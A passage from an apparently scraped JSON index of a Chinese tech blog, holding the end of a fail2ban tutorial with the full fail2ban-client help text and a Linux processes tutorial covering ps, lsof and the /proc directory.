IP解锁:fail2ban-client set opensips unbanip 192.168.1.8 白名单操作 IP加入白名单:fail2ban-client set opensips addignoreip 192.168.1.8 IP从白名单中移除:fail2ban-client set opensips delignoreip 192.168.1.8 在所有监狱中加入IP白名单:fail2ban-client unban 192.168.1.8 fail2ban的拦截是基于jail, 如果一个ip在某个jail中,但是不在其他jail中,那么这个ip也是无法访问主机。如果想在所有jail中加入一个白名单,需要fail2ban-client unban ip。\n**\nfail2ban-client帮助文档 Usage: fail2ban-client [OPTIONS] \u0026lt;COMMAND\u0026gt; Fail2Ban v0.10.5
reads log file that contains password failure report and bans the corresponding IP addresses using firewall rules. Options: -c \u0026lt;DIR\u0026gt; configuration directory -s \u0026lt;FILE\u0026gt; socket path -p \u0026lt;FILE\u0026gt; pidfile path --loglevel \u0026lt;LEVEL\u0026gt; logging level --logtarget \u0026lt;TARGET\u0026gt; logging target, use file-name or stdout, stderr, syslog or sysout. --syslogsocket auto|\u0026lt;FILE\u0026gt; -d dump configuration. For debugging --dp, --dump-pretty dump the configuration using more human readable representation -t, --test test configuration (can be also specified with start parameters) -i interactive mode -v increase verbosity -q decrease verbosity -x force execution of the server (remove socket file) -b start server in background (default) -f start server in foreground --async start server in async mode (for internal usage only, don\u0026#39;t read configuration) --timeout timeout to wait for the server (for internal usage only, don\u0026#39;t read configuration) --str2sec \u0026lt;STRING\u0026gt; convert time abbreviation format to seconds -h, --help display this help message -V, --version print the version (-V returns machine-readable short format) Command: BASIC start starts the server and the jails restart restarts the server restart [--unban] [--if-exists] \u0026lt;JAIL\u0026gt; restarts the jail \u0026lt;JAIL\u0026gt; (alias for \u0026#39;reload --restart ... 
\u0026lt;JAIL\u0026gt;\u0026#39;) reload [--restart] [--unban] [--all] reloads the configuration without restarting of the server, the option \u0026#39;--restart\u0026#39; activates completely restarting of affected jails, thereby can unban IP addresses (if option \u0026#39;--unban\u0026#39; specified) reload [--restart] [--unban] [--if-exists] \u0026lt;JAIL\u0026gt; reloads the jail \u0026lt;JAIL\u0026gt;, or restarts it (if option \u0026#39;--restart\u0026#39; specified) stop stops all jails and terminate the server unban --all unbans all IP addresses (in all jails and database) unban \u0026lt;IP\u0026gt; ... \u0026lt;IP\u0026gt; unbans \u0026lt;IP\u0026gt; (in all jails and database) status gets the current status of the server ping tests if the server is alive echo for internal usage, returns back and outputs a given string help return this output version return the server version LOGGING set loglevel \u0026lt;LEVEL\u0026gt; sets logging level to \u0026lt;LEVEL\u0026gt;. Levels: CRITICAL, ERROR, WARNING, NOTICE, INFO, DEBUG, TRACEDEBUG, HEAVYDEBUG or corresponding numeric value (50-5) get loglevel gets the logging level set logtarget \u0026lt;TARGET\u0026gt; sets logging target to \u0026lt;TARGET\u0026gt;. Can be STDOUT, STDERR, SYSLOG or a file get logtarget gets logging target set syslogsocket auto|\u0026lt;SOCKET\u0026gt; sets the syslog socket path to auto or \u0026lt;SOCKET\u0026gt;. Only used if logtarget is SYSLOG get syslogsocket gets syslog socket path flushlogs flushes the logtarget if a file and reopens it. For log rotation. DATABASE set dbfile \u0026lt;FILE\u0026gt; set the location of fail2ban persistent datastore. 
Set to \u0026#34;None\u0026#34; to disable get dbfile get the location of fail2ban persistent datastore set dbmaxmatches \u0026lt;INT\u0026gt; sets the max number of matches stored in database per ticket get dbmaxmatches gets the max number of matches stored in database per ticket set dbpurgeage \u0026lt;SECONDS\u0026gt; sets the max age in \u0026lt;SECONDS\u0026gt; that history of bans will be kept get dbpurgeage gets the max age in seconds that history of bans will be kept JAIL CONTROL add \u0026lt;JAIL\u0026gt; \u0026lt;BACKEND\u0026gt; creates \u0026lt;JAIL\u0026gt; using \u0026lt;BACKEND\u0026gt; start \u0026lt;JAIL\u0026gt; starts the jail \u0026lt;JAIL\u0026gt; stop \u0026lt;JAIL\u0026gt; stops the jail \u0026lt;JAIL\u0026gt;. The jail is removed status \u0026lt;JAIL\u0026gt; [FLAVOR] gets the current status of \u0026lt;JAIL\u0026gt;, with optional flavor or extended info JAIL CONFIGURATION set \u0026lt;JAIL\u0026gt; idle on|off sets the idle state of \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; ignoreself true|false allows the ignoring of own IP addresses set \u0026lt;JAIL\u0026gt; addignoreip \u0026lt;IP\u0026gt; adds \u0026lt;IP\u0026gt; to the ignore list of \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; delignoreip \u0026lt;IP\u0026gt; removes \u0026lt;IP\u0026gt; from the ignore list of \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; ignorecommand \u0026lt;VALUE\u0026gt; sets ignorecommand of \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; ignorecache \u0026lt;VALUE\u0026gt; sets ignorecache of \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; addlogpath \u0026lt;FILE\u0026gt; [\u0026#39;tail\u0026#39;] adds \u0026lt;FILE\u0026gt; to the monitoring list of \u0026lt;JAIL\u0026gt;, optionally starting at the \u0026#39;tail\u0026#39; of the file (default \u0026#39;head\u0026#39;). 
set \u0026lt;JAIL\u0026gt; dellogpath \u0026lt;FILE\u0026gt; removes \u0026lt;FILE\u0026gt; from the monitoring list of \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; logencoding \u0026lt;ENCODING\u0026gt; sets the \u0026lt;ENCODING\u0026gt; of the log files for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; addjournalmatch \u0026lt;MATCH\u0026gt; adds \u0026lt;MATCH\u0026gt; to the journal filter of \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; deljournalmatch \u0026lt;MATCH\u0026gt; removes \u0026lt;MATCH\u0026gt; from the journal filter of \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; addfailregex \u0026lt;REGEX\u0026gt; adds the regular expression \u0026lt;REGEX\u0026gt; which must match failures for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; delfailregex \u0026lt;INDEX\u0026gt; removes the regular expression at \u0026lt;INDEX\u0026gt; for failregex set \u0026lt;JAIL\u0026gt; addignoreregex \u0026lt;REGEX\u0026gt; adds the regular expression \u0026lt;REGEX\u0026gt; which should match pattern to exclude for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; delignoreregex \u0026lt;INDEX\u0026gt; removes the regular expression at \u0026lt;INDEX\u0026gt; for ignoreregex set \u0026lt;JAIL\u0026gt; findtime \u0026lt;TIME\u0026gt; sets the number of seconds \u0026lt;TIME\u0026gt; for which the filter will look back for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; bantime \u0026lt;TIME\u0026gt; sets the number of seconds \u0026lt;TIME\u0026gt; a host will be banned for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; datepattern \u0026lt;PATTERN\u0026gt; sets the \u0026lt;PATTERN\u0026gt; used to match date/times for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; usedns \u0026lt;VALUE\u0026gt; sets the usedns mode for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; attempt \u0026lt;IP\u0026gt; [\u0026lt;failure1\u0026gt; ... 
\u0026lt;failureN\u0026gt;] manually notify about \u0026lt;IP\u0026gt; failure set \u0026lt;JAIL\u0026gt; banip \u0026lt;IP\u0026gt; ... \u0026lt;IP\u0026gt; manually Ban \u0026lt;IP\u0026gt; for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; unbanip [--report-absent] \u0026lt;IP\u0026gt; ... \u0026lt;IP\u0026gt; manually Unban \u0026lt;IP\u0026gt; in \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; maxretry \u0026lt;RETRY\u0026gt; sets the number of failures \u0026lt;RETRY\u0026gt; before banning the host for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; maxmatches \u0026lt;INT\u0026gt; sets the max number of matches stored in memory per ticket in \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; maxlines \u0026lt;LINES\u0026gt; sets the number of \u0026lt;LINES\u0026gt; to buffer for regex search for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; addaction \u0026lt;ACT\u0026gt;[ \u0026lt;PYTHONFILE\u0026gt; \u0026lt;JSONKWARGS\u0026gt;] adds a new action named \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt;. 
Optionally for a Python based action, a \u0026lt;PYTHONFILE\u0026gt; and \u0026lt;JSONKWARGS\u0026gt; can be specified, else will be a Command Action set \u0026lt;JAIL\u0026gt; delaction \u0026lt;ACT\u0026gt; removes the action \u0026lt;ACT\u0026gt; from \u0026lt;JAIL\u0026gt; COMMAND ACTION CONFIGURATION set \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; actionstart \u0026lt;CMD\u0026gt; sets the start command \u0026lt;CMD\u0026gt; of the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; actionstop \u0026lt;CMD\u0026gt; sets the stop command \u0026lt;CMD\u0026gt; of the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; actioncheck \u0026lt;CMD\u0026gt; sets the check command \u0026lt;CMD\u0026gt; of the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; actionban \u0026lt;CMD\u0026gt; sets the ban command \u0026lt;CMD\u0026gt; of the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; actionunban \u0026lt;CMD\u0026gt; sets the unban command \u0026lt;CMD\u0026gt; of the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; timeout \u0026lt;TIMEOUT\u0026gt; sets \u0026lt;TIMEOUT\u0026gt; as the command timeout in seconds for the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; GENERAL ACTION CONFIGURATION set \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; \u0026lt;PROPERTY\u0026gt; \u0026lt;VALUE\u0026gt; sets the \u0026lt;VALUE\u0026gt; of \u0026lt;PROPERTY\u0026gt; for the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; set \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; \u0026lt;METHOD\u0026gt;[ \u0026lt;JSONKWARGS\u0026gt;] calls the \u0026lt;METHOD\u0026gt; with \u0026lt;JSONKWARGS\u0026gt; for the action \u0026lt;ACT\u0026gt; for 
\u0026lt;JAIL\u0026gt; JAIL INFORMATION get \u0026lt;JAIL\u0026gt; logpath gets the list of the monitored files for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; logencoding gets the encoding of the log files for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; journalmatch gets the journal filter match for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; ignoreself gets the current value of the ignoring the own IP addresses get \u0026lt;JAIL\u0026gt; ignoreip gets the list of ignored IP addresses for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; ignorecommand gets ignorecommand of \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; failregex gets the list of regular expressions which matches the failures for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; ignoreregex gets the list of regular expressions which matches patterns to ignore for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; findtime gets the time for which the filter will look back for failures for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; bantime gets the time a host is banned for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; datepattern gets the patern used to match date/times for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; usedns gets the usedns setting for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; maxretry gets the number of failures allowed for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; maxmatches gets the max number of matches stored in memory per ticket in \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; maxlines gets the number of lines to buffer for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; actions gets a list of actions for \u0026lt;JAIL\u0026gt; COMMAND ACTION INFORMATION get \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; actionstart gets the start command for the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; actionstop gets the stop command for the action 
\u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; actioncheck gets the check command for the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; actionban gets the ban command for the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; actionunban gets the unban command for the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; timeout gets the command timeout in seconds for the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; GENERAL ACTION INFORMATION get \u0026lt;JAIL\u0026gt; actionproperties \u0026lt;ACT\u0026gt; gets a list of properties for the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; actionmethods \u0026lt;ACT\u0026gt; gets a list of methods for the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; \u0026lt;PROPERTY\u0026gt; gets the value of \u0026lt;PROPERTY\u0026gt; for the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; Report bugs to https://github.com/fail2ban/fail2ban/issues Report bugs to https://github.com/fail2ban/fail2ban/issues\n","permalink":"https://wdd.js.org/posts/2020/04/ih9pz2/","summary":"简介 如果你的主机在公网上有端口暴露出去,那么总会有一些不怀好意的家伙,会尝试通过各种方式攻击你的机器。常见的服务例如ssh, nginx都会有类似的威胁。\n手工将某个ip加入黑名单,这种操作太麻烦,而且效率低。而fail2ban就是一种自动化的解决方案。\nfail2ban工作原理 fail2ban的工作原理是监控某个日志文件,然后根据某些关键词,提取出攻击方的IP地址,然后将其加入到黑名单。\nfail2ban安装 yum install fail2ban -y # 如果找不到fail2ban包,就执行下面的命令 yum install epel-release # 安装fail2ban 完成后 systemctl enable fail2ban # 设置fail2ban开机启动 systemctl start fail2ban # 启动fail2ban systemctl status fail2ban # 查看fail2ban的运行状态 用fail2ban保护ssh fail2ban的配置文件位于/etc/fail2ban目录下。\n在该目录下建立一个文件 jail.local, 内容如下\nbantime 持续禁止多久 maxretry 最大多少次尝试 banaction 拦截后的操作 findtime 查找时间 
下面这段配置的意思是:监控sshd服务的最近10分钟的日志,如果某个ip在10分钟之内,有2次登录失败,就把这个ip加入黑名单, 24小时之后,这个ip才会被从黑名单中移除。\n[DEFAULT] bantime = 24h banaction = iptables-multiport maxretry = 2 findtime = 10m [sshd] enabled = true 然后重启fail2ban, systemctl restart fail2ban fail2ban提供管理工具fail2ban-client","title":"自动IP拦截工具fail2ban使用教程"},{"content":"思考题:当你用ssh登录到一个linux机器,并且执行了某个hello.sh之后,有哪些进程参与了该过程?\nlinux系统架构 kernel mode user mode 内核态和用户态的区别 什么是进程 进程是运行的程序 process 是对 processor 虚拟化,通过时间片 进程都有uid nginx访问某个目录,Permission denied\n进程都有pid $$ 进程都有父进程 准确来说,除了pid为0的进程之外,其他进程都有父进程 有时候,你用kill命令杀死了一个进程,但是立马你就发现这个进程又起来了。你就要看看,这个进程是不是有个非init进程的父进程。一般这个进程负责监控子进程,一旦子进程挂掉,就会去重新创建一个进程。所以你需要找到这个父进程的Id,先把父进程kill掉,然后再kill子进程。 进程是一棵树 #!/bin/bash echo \u0026#34;pid is $$\u0026#34; times=0 while true do sleep 2s; let times++; echo $times hello; done ➜ ~ pstree 24601 sshd─┬─3*[sshd───zsh] ├─sshd───zsh───pstree └─sshd───zsh───world.sh───sleep 进程都有生命周期 创建 销毁 进程都有状态 running 进程占用CPU, 正在执行指令 ready 进程所有需要的资源都已经就绪,等待进入CPU执行 blocked 进程被某些事件阻断,例如IO。 进程的状态转移图\n进程都有打开的文件描述符 使用lsof命令,可以查看某个进程所打开的文件描述符\n/proc/pid/fd/目录下也有文件描述符\nlsof -c 进程名 lsof -p 进程号 lsof filename # 查看某个文件被哪个进程打开**\n[root@localhost ~]# lsof -c rtpproxy COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME rtpproxy 2073 root cwd DIR 253,0 4096 128 / rtpproxy 2073 root rtd DIR 253,0 4096 128 / rtpproxy 2073 root txt REG 253,0 933247 18295252 /usr/local/bin/rtpproxy rtpproxy 2073 root mem REG 253,0 2127336 33617010 /usr/lib64/libc-2.17.so rtpproxy 2073 root mem REG 253,0 44448 33617041 /usr/lib64/librt-2.17.so rtpproxy 2073 root mem REG 253,0 19776 34757658 /usr/lib64/libdl-2.17.so rtpproxy 2073 root mem REG 253,0 1139680 34757660 /usr/lib64/libm-2.17.so rtpproxy 2073 root mem REG 253,0 144792 33617035 /usr/lib64/libpthread-2.17.so rtpproxy 2073 root mem REG 253,0 164112 33595530 /usr/lib64/ld-2.17.so rtpproxy 2073 root 0u CHR 1,3 0t0 1028 /dev/null rtpproxy 2073 root 1u CHR 1,3 0t0 1028 /dev/null rtpproxy 2073 root 2u CHR 1,3 0t0 1028 /dev/null rtpproxy 2073 root 3u IPv4 17641
0t0 UDP 192.168.40.100:7890 rtpproxy 2073 root 4u unix 0xffff880079260000 0t0 17642 socket rtpproxy 2073 root 8u IPv4 72592335 0t0 UDP 192.168.40.100:25257 进程都有资源限制 /proc/pid/limits\n以rtpproxy为例子,rtpproxy的pid为2073, /proc/pid/limits文件记录进程的资源限制\n进程都有环境变量 /proc/pid/environ\n进程都有参数 /proc/pid/cmdline\nrtpproxy-A192.168.40.100-l192.168.40.100-sudp:192.168.40.1007890-F-m20000-M40000-L20000-dDBUG[root@localhost 2073]# 进程都有名字 /proc/2073/status\nName:\trtpproxy State:\tS (sleeping) Tgid:\t2073 Ngid:\t0 Pid:\t2073 PPid:\t1 TracerPid:\t0 Uid:\t0\t0\t0\t0 Gid:\t0\t0\t0\t0 进程皆有退出码 非0的退出码一般是异常退出 $? [root@localhost 2073]# cat \u0026#34;test\u0026#34; [root@localhost 2073]# echo $? 1 [root@localhost 2073]# echo $? 0 进程可以fork 孤儿进程 孤儿进程:一个父进程退出,而它的一个或多个子进程还在运行,那么那些子进程将成为孤儿进程。孤儿进程将被init进程(进程号为1)所收养,并由init进程对它们完成状态收集工作。\n僵尸进程 僵尸进程:一个进程使用fork创建子进程,如果子进程退出,而父进程并没有调用wait或waitpid获取子进程的状态信息,那么子进程的进程描述符仍然保存在系统中。这种进程称之为僵死进程。 僵尸进程占用进程描述符,无法释放,会导致系统无法正常的创建进程。\n\u0026gt; cat /proc/sys/kernel/pid_max 32768 进程间通信 进程之间的所有资源都是完全隔离的,所以进程之间如何通信呢?\n在linux底层,有个套接字API\nSOCKET socket (int domain, int type, int protocol) domain 表示域,一般有两个值 AF_INET 即因特网 AF_LOCAL 用于同一台机器上的进程间通信 type 表示类型 SOCK_STREAM 提供可靠的、全双工、面向连接的字节流,一般就是TCP SOCK_DGRAM 提供不可靠、尽力而为的数据报服务,一般就是UDP SOCK_RAW 允许直接访问IP层原生的数据报 也就是说,进程间通信,实际上也是用的socket\n守护进程 守护进程一般是后台运行的进程,例如sshd, mysqld, dockerd等等,他们的特点就是他们的ppid是1, 也就是说,守护进程也是孤儿进程的一种。\nroot 9696 1 0 Oct06 ? 00:05:16 /usr/sbin/sshd -D idle进程与init进程 Linux下有3个特殊的进程**,idle进程(PID = 0), init进程(PID = 1)和kthreadd(PID = 2)**\nidle进程由系统自动创建, 运行在内核态。idle进程其pid=0,其前身是系统创建的第一个进程,也是唯一一个没有通过fork或者kernel_thread产生的进程。完成加载系统后,演变为进程调度、交换 init进程由idle通过kernel_thread创建,在内核空间完成初始化后, 加载init程序, 并最终进入用户空间。由0进程创建,完成系统的初始化.
是系统中所有其它用户进程的祖先进程 Linux中的所有进程都是由init进程创建并运行的。首先Linux内核启动,然后在用户空间中启动init进程,再启动其他系统进程。在系统启动完成后,init将变为守护进程监视系统其他进程。 kthreadd进程由idle通过kernel_thread创建,并始终运行在内核空间, 负责所有内核线程的调度和管理 参考:https://blog.csdn.net/gatieme/article/details/51484562\n线程 ps -m可以在进程之后显示线程。线程的tid也会占用一个/proc/tid目录,和进程的/proc/pid 目录没什么区别。\n只不过进程的Tgid(线程组Id)是自己的pid, 而其他线程的Tgid是主线程的pid。\nps -em -o pid,tid,command | grep rtpproxy -A10 2112 - rtpproxy -l 192.168.40.101 -s udp:192.168.40.101 7890 -F -m 20000 -M 40000 -L 20000 -d DBUG - 2112 - - 2113 - - 2114 - - 2115 - - 2116 - - 2117 - - 2118 - 进程与线程的区别 关于/proc目录 proc目录是一个虚拟的文件系统,实际上是内核的数据结构的映射。里面的大部分的文件都是只读的,只有少部分是可写的。\n关于进程运行时信息,都可以在这个目录找到。\n下面的链接详细的介绍了每个目录的作用。\nhttps://www.linux.com/news/discover-possibilities-proc-directory/\nhttps://www.tldp.org/LDP/sag/html/proc-fs.html\nhttp://man7.org/linux/man-pages/man5/proc.5.html\n思考\n如何获取某个执行进程的可执行文件的路径? proc目录下的文件有何特点? 以下的几个文件是比较重要的,着重说明一下。\ncmdline 执行参数 environ 环境变量 ** exe -\u0026gt; /usr/local/bin/rtpproxy 可执行文件位置** ** fd 文件描述符信息** ** limits 资源限制** oom killer机制:杀掉最胖的那个进程 oom_adj oom_score oom_score_adj status 状态信息 dr-xr-xr-x. 2 root root 0 Jan 14 15:56 attr -rw-r--r--. 1 root root 0 Jan 14 15:56 autogroup -r--------. 1 root root 0 Jan 14 15:56 auxv -r--r--r--. 1 root root 0 Nov 6 17:59 cgroup --w-------. 1 root root 0 Jan 14 15:56 clear_refs -r--r--r--. 1 root root 0 Nov 6 10:26 cmdline -rw-r--r--. 1 root root 0 Nov 6 17:59 comm -rw-r--r--. 1 root root 0 Jan 14 15:56 coredump_filter -r--r--r--. 1 root root 0 Jan 14 15:56 cpuset lrwxrwxrwx. 1 root root 0 Jan 14 15:56 cwd -\u0026gt; / -r--------. 1 root root 0 Jan 14 15:56 environ lrwxrwxrwx. 1 root root 0 Nov 6 17:59 exe -\u0026gt; /usr/local/bin/rtpproxy dr-x------. 2 root root 0 Jan 14 15:56 fd dr-x------. 2 root root 0 Jan 14 15:56 fdinfo -rw-r--r--. 1 root root 0 Jan 14 15:56 gid_map -r--------. 1 root root 0 Jan 14 15:56 io -r--r--r--. 1 root root 0 Jan 14 15:56 limits -rw-r--r--. 1 root root 0 Nov 6 17:59 loginuid dr-x------.
2 root root 0 Jan 14 15:56 map_files -r--r--r--. 1 root root 0 Jan 14 15:56 maps -rw-------. 1 root root 0 Jan 14 15:56 mem -r--r--r--. 1 root root 0 Jan 14 15:56 mountinfo -r--r--r--. 1 root root 0 Jan 14 15:56 mounts -r--------. 1 root root 0 Jan 14 15:56 mountstats dr-xr-xr-x. 5 root root 0 Jan 14 15:56 net dr-x--x--x. 2 root root 0 Jan 14 15:56 ns -r--r--r--. 1 root root 0 Jan 14 15:56 numa_maps -rw-r--r--. 1 root root 0 Jan 14 15:56 oom_adj -r--r--r--. 1 root root 0 Jan 14 15:56 oom_score -rw-r--r--. 1 root root 0 Jan 14 15:56 oom_score_adj -r--r--r--. 1 root root 0 Jan 14 15:56 pagemap -r--r--r--. 1 root root 0 Jan 14 15:56 personality -rw-r--r--. 1 root root 0 Jan 14 15:56 projid_map lrwxrwxrwx. 1 root root 0 Jan 14 15:56 root -\u0026gt; / -rw-r--r--. 1 root root 0 Jan 14 15:56 sched -r--r--r--. 1 root root 0 Nov 6 17:59 sessionid -rw-r--r--. 1 root root 0 Jan 14 15:56 setgroups -r--r--r--. 1 root root 0 Jan 14 15:56 smaps -r--r--r--. 1 root root 0 Jan 14 15:56 stack -r--r--r--. 1 root root 0 Jan 14 15:56 stat -r--r--r--. 1 root root 0 Jan 14 15:56 statm -r--r--r--. 1 root root 0 Nov 6 10:26 status -r--r--r--. 1 root root 0 Jan 14 15:56 syscall dr-xr-xr-x. 9 root root 0 Jan 14 15:56 task -r--r--r--. 1 root root 0 Jan 14 15:56 timers -rw-r--r--. 1 root root 0 Jan 14 15:56 uid_map -r--r--r--. 1 root root 0 Jan 14 15:56 wchan 工具简介 ps ps有三种风格的使用方式,我们一般使用前两种\nUnix风格 参数以-开头,如-a BSD风格,直接用参数 如a GNU风格,以\u0026ndash;开头 常用的有\nps -ef ps aux VSZ 虚拟内存,单位kb RSS 物理内存,单位kb ➜ 2112 ps -ef | head UID PID PPID C STIME TTY TIME CMD root 1 0 0 2018 ? 01:57:34 /usr/lib/systemd/systemd --system --deserialize 23 root 2 0 0 2018 ? 00:00:44 [kthreadd] root 3 2 0 2018 ? 00:05:44 [ksoftirqd/0] root 7 2 0 2018 ? 00:08:04 [migration/0] root 8 2 0 2018 ? 00:00:00 [rcu_bh] root 9 2 0 2018 ? 00:00:00 [rcuob/0] root 10 2 0 2018 ? 00:00:00 [rcuob/1] root 11 2 0 2018 ? 00:00:00 [rcuob/2] root 12 2 0 2018 ?
00:00:00 [rcuob/3] ➜ 2112 ps aux | head USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.0 193524 3572 ? Ss 2018 117:34 /usr/lib/systemd/systemd --system --deserialize 23 root 2 0.0 0.0 0 0 ? S 2018 0:44 [kthreadd] root 3 0.0 0.0 0 0 ? S 2018 5:44 [ksoftirqd/0] root 7 0.0 0.0 0 0 ? S 2018 8:04 [migration/0] root 8 0.0 0.0 0 0 ? S 2018 0:00 [rcu_bh] root 9 0.0 0.0 0 0 ? S 2018 0:00 [rcuob/0] root 10 0.0 0.0 0 0 ? S 2018 0:00 [rcuob/1] root 11 0.0 0.0 0 0 ? S 2018 0:00 [rcuob/2] root 12 0.0 0.0 0 0 ? S 2018 0:00 [rcuob/3] ps 查看线程\n➜ 2118 ps -em -o pid,tid,command | grep rtpproxy -A 10 2112 - rtpproxy -l 192.168.40.101 -s udp:192.168.40.101 7890 -F -m 20000 -M 40000 -L 20000 -d DBUG - 2112 - - 2113 - - 2114 - - 2115 - - 2116 - - 2117 - - 2118 - cat /proc/2112/status Name:\trtpproxy State:\tS (sleeping) Tgid:\t2112 Ngid:\t0 Pid:\t2112 PPid:\t1 TracerPid:\t0 Uid:\t0\t0\t0\t0 Gid:\t0\t0\t0\t0 FDSize:\t16384 Groups:\t0 VmPeak:\t390896 kB VmSize:\t259824 kB VmLck:\t0 kB VmPin:\t0 kB VmHWM:\t121708 kB VmRSS:\t3532 kB VmData:\t246120 kB VmStk:\t136 kB VmExe:\t176 kB VmLib:\t3092 kB VmPTE:\t316 kB VmSwap:\t2272 kB Threads:\t7 SigQ:\t2/15086 SigPnd:\t0000000000000000 ShdPnd:\t0000000000000000 SigBlk:\t0000000000000000 SigIgn:\t0000000000001000 SigCgt:\t0000000187804a03 CapInh:\t0000000000000000 CapPrm:\t0000001fffffffff CapEff:\t0000001fffffffff CapBnd:\t0000001fffffffff Seccomp:\t0 Cpus_allowed:\tf Cpus_allowed_list:\t0-3 Mems_allowed:\t00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001 Mems_allowed_list:\t0 voluntary_ctxt_switches:\t259223710 nonvoluntary_ctxt_switches:\t2216 netstat netstat -nulp netstat -ntulp netstat -nap lsof Linux下所有信息都是文件,那么查看打开文件就比较重要了。 lsof 即 list open files, 查看打开的文件\nlsof -c processName 按照进程名查看 lsof -p pid
按照pid查看 lsof file 查看文件被哪些进程打开 lsof -i:8080 查看8080被哪个进程占用 top top 1 P M 参考 http://turnoff.us/geek/inside-the-linux-kernel/ 《How Linux Works》 《Operating Systems three easy pieces》 讲虚拟化、并发、持久化三块 《理解Unix进程》 《Linux Shell Script cookbook》 https://www.internalpointers.com/post/gentle-introduction-multithreading https://dev.to/rrampage/surviving-the-linux-oom-killer-2ki9 附件书籍 proc(5) - Linux manual page.pdfCommand Line Text Processing - Sundeep Agarwal.pdfHow Linux Works _ What Every Superuser Sho - Brian Ward(Author).pdfOperating Systems three easy pieces - Unknown.pdf[Sarath Lakshman] Linux Shell Scripting Co - Unknown.pdftcp_ipGao Xiao Bian Cheng __Gai Shan Wang - Unknown.pdf\n","permalink":"https://wdd.js.org/posts/2020/04/pbcbub/","summary":"思考题:当你用ssh登录到一个linux机器,并且执行了某个hello.sh之后,有哪些进程参与了该过程?\nlinux系统架构 kernel mode user mode 内核态和用户态的区别 什么是进程 进程是运行的程序 process 是对 processor 虚拟化,通过时间片 进程都有uid nginx访问某个目录,Permission denied\n进程都有pid $$ 进程都有父进程 